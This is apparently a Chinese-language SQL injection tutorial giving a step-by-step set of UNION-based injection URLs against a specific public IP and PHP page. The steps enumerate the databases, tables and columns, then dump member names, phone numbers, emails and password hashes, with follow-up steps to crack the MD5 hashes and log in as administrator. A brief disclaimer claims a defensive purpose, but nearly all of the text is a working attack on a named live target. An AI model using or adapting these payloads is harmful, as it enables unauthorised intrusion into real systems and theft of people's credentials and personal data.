1.获得当前连接的所有数据库名
https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat( schema_name,char(10),’’,char(10),’’,char(10),’’,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.schemata limit 1,10—
&mid=1#### 2.获得当前数据库的所有表名
获得当前库的所有表,表所在的库,表的行数和表的功能注释
https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat( table_schema,char(10),table_name,char(10),table_rows,char(10),table_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.tables where table_schema=database() limit 1,10—#### 3.获得web后台管理员密码可能所在的表
获得当前库的所有表,表所有的库,表的行数和表的功能注释
https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat( table_schema,char(10),table_name,char(10),table_rows,char(10),table_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.tables where table_schema=database() and table_name>=‘a’ and table_name<‘b’ limit 1,10—#### 4.获得用户表的所有字段
获得用户名的所有字段,字段行数和字段的功能注释
https://61.206.45.132/corp/tokusyu.php
?page=2
&cnt_all=100
&tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat( table_schema,char(10),table_name,char(10),column_name,char(10),column_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.columns where table_schema=database() and table_name=‘member’ limit 1,10—#### 5.获得web后台管理员的用户名、密码、邮箱等敏感信息
union select 1,2,3,4,5,6,7,8,9,concat(ifnull(MEMBER_NAME,’null’),char(10),ifnull(MOBILE,’null’),char(10),ifnull(E_MAIL,’null’),char(10),ifnull(PWD,’null’),char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from ZAKKANET.MEMBER limit 1,10—
下一步1:密码的md5对比得出明文密码 下一步2:Web后台管理员登录
警告:任何提权成功入侵后台均为非法,非本教程目的,本教程了解入侵的目标为防预,入侵网站后台一切后果自负责任。
若有收获,就点个赞吧
0 人点赞
